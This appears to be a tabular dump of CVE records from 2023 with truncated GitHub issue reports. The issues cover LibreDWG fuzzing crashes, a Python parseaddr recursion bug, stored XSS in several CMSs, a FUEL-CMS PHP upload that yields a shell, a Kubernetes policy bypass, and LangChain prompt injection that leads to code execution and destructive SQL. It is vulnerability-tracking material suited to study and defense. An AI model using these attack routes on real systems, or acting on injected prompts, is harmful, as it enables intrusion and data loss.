/li... | [FUZZ] two bugs in dwg2dxf | https://api.github.com/repos/LibreDWG/libredwg/issues/677/comments | 2 | 2023-03-30T04:10:56Z | 2023-04-04T14:03:23Z | https://github.com/LibreDWG/libredwg/issues/677 | 1,646,878,719 | 677 |
CVE-2023-36274 | 2023-06-23T15:15:10.213 | LibreDWG v0.12.5 was discovered to contain a heap buffer overflow via the function bit_write_TF at bits.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/LibreDWG/libredwg/issues/677#BUG2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"T... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gnu:libredwg:0.12.5:*:*:*:*:*:*:*",
"matchCriteriaId": "8B002438-509E-462D-B17E-129197C3E4B3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludin... | [
"787"
] | 787 | https://github.com/LibreDWG/libredwg/issues/677#BUG2 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"LibreDWG",
"libredwg"
] |
Hello, I was testing my fuzzer and found two bugs in dwg2dxf, which is different from #368 and #484
## environment
ubuntu 20.04, GCC 9.4.0, libredwg latest commit 77a85621de6e2c7ea44bc48c02e52dac97778ecb
compile with
```
./autogen.sh && ./configure --disable-shared && make -j$(nproc)
```
## BUG1
```
/li... | [FUZZ] two bugs in dwg2dxf | https://api.github.com/repos/LibreDWG/libredwg/issues/677/comments | 2 | 2023-03-30T04:10:56Z | 2023-04-04T14:03:23Z | https://github.com/LibreDWG/libredwg/issues/677 | 1,646,878,719 | 677 |
CVE-2023-36632 | 2023-06-25T18:15:09.313 | The legacy email.utils.parseaddr function in Python through 3.11.4 allows attackers to trigger "RecursionError: maximum recursion depth exceeded while calling a Python object" via a crafted argument. This argument is plausibly an untrusted value from an application's input data that was supposed to contain a name and a... | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://docs.python.org/3/library/email.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://docs.python.org/3/library/email.utils.html"
},
{
"source": "cve@mitre.org",
"ta... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FBFABA38-746A-451D-A9DB-8AF31A4AE9B3",
"versionEndExcluding": null,
"versionEndIncluding": "3.11.4",
"versionStartExcludin... | [
"674"
] | 674 | https://github.com/python/cpython/issues/103800 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"python",
"cpython"
] | # Bug report
We did a fuzzing test on Python3.9.15, a recursion error happened.
```python
from email.utils import *
import email
import email.utils
import re
class demoCls():
def __init__(self):
pass
def demoFunc(self, arg):
try:
ret = email.utils.parseaddr(arg)... | RecursionError in email.utils.parseaddr | https://api.github.com/repos/python/cpython/issues/103800/comments | 2 | 2023-04-24T21:53:40Z | 2023-04-25T17:55:49Z | https://github.com/python/cpython/issues/103800 | 1,682,097,315 | 103,800 |
CVE-2023-33661 | 2023-06-29T00:15:09.567 | Multiple cross-site scripting (XSS) vulnerabilities were discovered in Church CRM v4.5.3 in GroupReports.php via GroupRole, ReportModel, and OnlyCart parameters. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/ChurchCRM/CRM/issues/6474"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/ChurchCRM... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:*",
"matchCriteriaId": "C5A21E4C-1CE8-4C97-9374-DD8EBDB942D5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartEx... | [
"79"
] | 79 | https://github.com/ChurchCRM/CRM/issues/6474 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"ChurchCRM",
"CRM"
] | **If you have the ChurchCRM software running, please file an issue using the _Report an issue_ in the help menu.**
#### On what page in the application did you find this issue?
/churchcrm/GroupReports.php
#### On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?
Linux
#### What ... | XSS exists in the group report page | https://api.github.com/repos/ChurchCRM/CRM/issues/6474/comments | 2 | 2023-04-21T19:07:58Z | 2023-11-05T01:05:42Z | https://github.com/ChurchCRM/CRM/issues/6474 | 1,678,971,305 | 6,474 |
CVE-2020-22151 | 2023-07-03T21:15:09.240 | Permissions vulnerability in Fuel-CMS v.1.4.6 allows a remote attacker to execute arbitrary code via a crafted zip file to the assests parameter of the upload function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"in... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/daylightstudio/FUEL-CMS/issues/551"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Vendo... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.6:*:*:*:*:*:*:*",
"matchCriteriaId": "F67321E5-38B6-455B-8BD2-B8C71878FC72",
"versionEndExcluding": null,
"versionEndIncluding": null,
"version... | [
"434"
] | 434 | https://github.com/daylightstudio/FUEL-CMS/issues/551 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"daylightstudio",
"FUEL-CMS"
] | 1. First create a php file that executes the command and compress the php file into a zip
<img width="606" alt="1" src="https://user-images.githubusercontent.com/9522862/74303980-98127100-4d96-11ea-9b59-101e6d44d889.png">
<img width="320" alt="2" src="https://user-images.githubusercontent.com/9522862/74304008-b11b22... | getshell in assets | https://api.github.com/repos/daylightstudio/FUEL-CMS/issues/551/comments | 1 | 2020-02-12T04:56:19Z | 2020-09-30T20:49:24Z | https://github.com/daylightstudio/FUEL-CMS/issues/551 | 563,752,895 | 551 |
CVE-2020-22152 | 2023-07-03T21:15:09.293 | Cross Site Scripting vulnerability in daylight studio FUEL- CMS v.1.4.6 allows a remote attacker to execute arbitrary code via the page title, meta description and meta keywords of the pages function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/daylightstudio/FUEL-CMS/issues/552"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Vendo... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.6:*:*:*:*:*:*:*",
"matchCriteriaId": "F67321E5-38B6-455B-8BD2-B8C71878FC72",
"versionEndExcluding": null,
"versionEndIncluding": null,
"version... | [
"79"
] | 79 | https://github.com/daylightstudio/FUEL-CMS/issues/552 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"daylightstudio",
"FUEL-CMS"
] | Stored xss in Page title, Meta description, Meta keywords of pages
<img width="1140" alt="xss1" src="https://user-images.githubusercontent.com/9522862/74311085-9a31fb00-4da9-11ea-84a0-b65eb76ba02b.png">
<img width="1146" alt="xss2" src="https://user-images.githubusercontent.com/9522862/74311126-aae27100-4da9-11ea-9f8... | XSS in pages | https://api.github.com/repos/daylightstudio/FUEL-CMS/issues/552/comments | 0 | 2020-02-12T07:10:34Z | 2021-04-15T18:33:49Z | https://github.com/daylightstudio/FUEL-CMS/issues/552 | 563,798,483 | 552 |
CVE-2020-22153 | 2023-07-03T21:15:09.340 | File Upload vulnerability in FUEL-CMS v.1.4.6 allows a remote attacker to execute arbitrary code via a crafted .php file to the upload parameter in the navigation function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"in... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/daylightstudio/FUEL-CMS/issues/553"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Vendo... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.6:*:*:*:*:*:*:*",
"matchCriteriaId": "F67321E5-38B6-455B-8BD2-B8C71878FC72",
"versionEndExcluding": null,
"versionEndIncluding": null,
"version... | [
"434"
] | 434 | https://github.com/daylightstudio/FUEL-CMS/issues/553 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"daylightstudio",
"FUEL-CMS"
] |
<img width="837" alt="c1" src="https://user-images.githubusercontent.com/9522862/74326653-bc397680-4dc5-11ea-9e41-c24b32bf4bad.png">
upload function:
<img width="1006" alt="c2" src="https://user-images.githubusercontent.com/9522862/74326673-c3608480-4dc5-11ea-89d8-9246baff623c.png">
$This-> fuel-> navigation-> u... | Code execution in navigation/upload | https://api.github.com/repos/daylightstudio/FUEL-CMS/issues/553/comments | 0 | 2020-02-12T10:44:49Z | 2020-09-30T21:04:55Z | https://github.com/daylightstudio/FUEL-CMS/issues/553 | 563,911,041 | 553 |
CVE-2023-2727 | 2023-07-03T21:15:09.480 | Users may be able to launch containers using images that are restricted by ImagePolicyWebhook when using ephemeral containers. Kubernetes clusters are only affected if the ImagePolicyWebhook admission plugin is used together with ephemeral containers. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"inte... | [
{
"source": "jordan@liggitt.net",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/07/06/2"
},
{
"source": "jordan@liggitt.net",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/kubernetes/kubern... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*",
"matchCriteriaId": "44D47082-4E70-4CBE-B52B-B2A83903F17B",
"versionEndExcluding": null,
"versionEndIncluding": "1.24.14",
"versionStar... | [
"20"
] | 20 | https://github.com/kubernetes/kubernetes/issues/118640 | [
"Issue Tracking"
] | github.com | [
"kubernetes",
"kubernetes"
] | ### CVE-2023-2727: Bypassing policies imposed by the ImagePolicyWebhook admission plugin
CVSS Rating: [CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N)
A security issue was discovered in Kubernetes where users may be able to launch... | CVE-2023-2727, CVE-2023-2728: Bypassing policies imposed by the ImagePolicyWebhook and bypassing mountable secrets policy imposed by the ServiceAccount admission plugin | https://api.github.com/repos/kubernetes/kubernetes/issues/118640/comments | 10 | 2023-06-13T14:42:06Z | 2024-07-01T15:57:09Z | https://github.com/kubernetes/kubernetes/issues/118640 | 1,755,056,681 | 118,640 |
CVE-2023-36258 | 2023-07-03T21:15:09.797 | An issue in LangChain before 0.0.236 allows an attacker to execute arbitrary code because Python code with os.system, exec, or eval can be used. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"in... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Mitigation"
],
"url": "https://github.com/hwchase17/langchain/issues/5872"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Mitigation"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:langchain:langchain:0.0.199:*:*:*:*:*:*:*",
"matchCriteriaId": "99FB5025-85A6-41B6-B0DC-7D34C5FCFB6A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStart... | [
"94"
] | 94 | https://github.com/hwchase17/langchain/issues/5872 | [
"Exploit",
"Issue Tracking",
"Mitigation"
] | github.com | [
"hwchase17",
"langchain"
] | ### System Info
langchain version: `0.0.194`
os: `ubuntu 20.04`
python: `3.9.13`
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Promp... | Prompt injection which leads to arbitrary code execution in `langchain.chains.PALChain` | https://api.github.com/repos/langchain-ai/langchain/issues/5872/comments | 5 | 2023-06-08T08:45:37Z | 2023-08-29T16:31:34Z | https://github.com/langchain-ai/langchain/issues/5872 | 1,747,393,600 | 5,872 |
CVE-2023-36189 | 2023-07-06T14:15:10.707 | SQL injection vulnerability in langchain before v0.0.247 allows a remote attacker to obtain sensitive information via the SQLDatabaseChain component. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://gist.github.com/rharang/9c58d39db8c01db5b7c888e467c0533f"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "https://github.com/hwchase17/langchain/issues/5923"
},
{
"source": "cve@mitre.org",
"t... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:langchain:langchain:0.0.64:*:*:*:*:*:*:*",
"matchCriteriaId": "0D9CEC27-1B1B-4365-82F1-2538DD3F158D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartE... | [
"89"
] | 89 | https://github.com/hwchase17/langchain/issues/5923 | [
"Exploit"
] | github.com | [
"hwchase17",
"langchain"
] | ### System Info
There is no safeguard in SQLDatabaseChain to prevent a malicious user from sending a prompt such as "Drop Employee table".
SQLDatabaseChain should have a facility to intercept and review the SQL before sending it to the database.
Creating this separately from https://github.com/hwchase17/langch... | SQLDatabaseChain has SQL injection issue | https://api.github.com/repos/langchain-ai/langchain/issues/5923/comments | 7 | 2023-06-09T07:19:24Z | 2024-03-13T16:12:29Z | https://github.com/langchain-ai/langchain/issues/5923 | 1,749,279,355 | 5,923 |
CVE-2023-37132 | 2023-07-06T15:15:16.253 | A stored cross-site scripting (XSS) vulnerability in the custom variables module of eyoucms v1.6.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/weng-xianhu/eyoucms/issues/45"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/weng-... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.3:*:*:*:*:*:*:*",
"matchCriteriaId": "0DDC6EF0-7D79-4155-B984-0BA7756C05EC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclud... | [
"79"
] | 79 | https://github.com/weng-xianhu/eyoucms/issues/45 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"weng-xianhu",
"eyoucms"
] | 123 | 123 | https://api.github.com/repos/weng-xianhu/eyoucms/issues/45/comments | 0 | 2023-06-27T03:33:35Z | 2024-03-22T06:49:26Z | https://github.com/weng-xianhu/eyoucms/issues/45 | 1,776,028,889 | 45 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.